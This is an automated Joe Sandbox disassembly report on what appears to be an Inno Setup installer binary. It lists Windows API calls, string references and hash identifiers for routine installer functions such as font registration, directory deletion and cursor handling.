                                                                                    • Opcode Fuzzy Hash: baac78b6894afdadca5406328ae54855ea87cee56314610671aef23ecde7ca45
                                                                                    • Instruction Fuzzy Hash: 73410670A043086BDB10EFD5D841B9DBBF9AF45305F50407BA918BB292D7789A09CB59
                                                                                    APIs
                                                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044C9FD
                                                                                    • GetSysColor.USER32(00000014), ref: 0044CA04
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044CA1C
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA45
                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA4F
                                                                                    • GetSysColor.USER32(00000010), ref: 0044CA56
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0044CA6E
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA97
                                                                                    • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$Color$Draw$OffsetRect
                                                                                    • String ID:
                                                                                    • API String ID: 1005981011-0
                                                                                    • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                    • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                                    • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                    • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                                    APIs
                                                                                      • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                      • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                                    • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                                    • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                                    Strings
                                                                                    • Deleting Uninstall data files., xrefs: 00494957
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                    • String ID: Deleting Uninstall data files.
                                                                                    • API String ID: 1570157960-2568741658
                                                                                    • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                    • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                                    • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                    • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                                    APIs
                                                                                      • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                                    • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                                    • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                                    Strings
                                                                                    • Failed to open Fonts registry key., xrefs: 0046F265
                                                                                    • AddFontResource, xrefs: 0046F299
                                                                                    • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                    • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                    • API String ID: 955540645-649663873
                                                                                    • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                    • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                                    • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                    • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                                    APIs
                                                                                      • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                      • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                      • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                    • GetVersion.KERNEL32 ref: 00462588
                                                                                    • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                                    • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                                    • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                    • String ID: Explorer
                                                                                    • API String ID: 2594429197-512347832
                                                                                    • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                    • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                                    • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                    • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                    • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                    • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                    • API String ID: 2704155762-2318956294
                                                                                    • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                    • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                                    • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                    • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                                    • LocalFree.KERNEL32(00642FA8,00000000,00401B68), ref: 00401ACF
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00642FA8,00000000,00401B68), ref: 00401AEE
                                                                                    • LocalFree.KERNEL32(00643FA8,?,00000000,00008000,00642FA8,00000000,00401B68), ref: 00401B2D
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                                    • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                    • String ID: |Ed
                                                                                    • API String ID: 3782394904-1702581799
                                                                                    • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                    • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                                    • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                                    • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                                      • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                                    Strings
                                                                                    • Failed to strip read-only attribute., xrefs: 004595C0
                                                                                    • Deleting directory: %s, xrefs: 0045957B
                                                                                    • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                                    • Failed to delete directory (%d)., xrefs: 00459688
                                                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                                    • Stripped read-only attribute., xrefs: 004595B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseErrorFindLast
                                                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                    • API String ID: 754982922-1448842058
                                                                                    • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                    • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                                    • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                    • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 00422EB4
                                                                                    • GetCapture.USER32 ref: 00422EC3
                                                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                    • ReleaseCapture.USER32 ref: 00422ECE
                                                                                    • GetActiveWindow.USER32 ref: 00422EDD
                                                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                    • GetActiveWindow.USER32 ref: 00422FCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                    • String ID:
                                                                                    • API String ID: 862346643-0
                                                                                    • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                    • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                                    • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                    • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                                    APIs
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                                    • GetActiveWindow.USER32 ref: 0042F14E
                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                                    • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$Message
                                                                                    • String ID:
                                                                                    • API String ID: 2785966331-0
                                                                                    • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                    • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                                    • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                    • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000), ref: 0042949A
                                                                                    • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                      • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                    • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                    • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                    • String ID:
                                                                                    • API String ID: 361401722-0
                                                                                    • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                    • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                                    • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                    • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                                    APIs
                                                                                    • 73A0A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                                    • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                                    • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                    • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                    • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                    • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                    • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                    • String ID:
                                                                                    • API String ID: 2920975243-0
                                                                                    • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                    • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                                    • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                    • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                                    APIs
                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                                    • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                                    • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load
                                                                                    • String ID: $ $Internal error: Item already expanding
                                                                                    • API String ID: 1675784387-1948079669
                                                                                    • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                    • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                                    • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                    • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                                    • 73A159E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                                    • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A159ClassInfoMessageSend
                                                                                    • String ID: COMBOBOX$Inno Setup: Language
                                                                                    • API String ID: 3375322265-4234151509
                                                                                    • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                    • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                                    • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                    • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                      • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
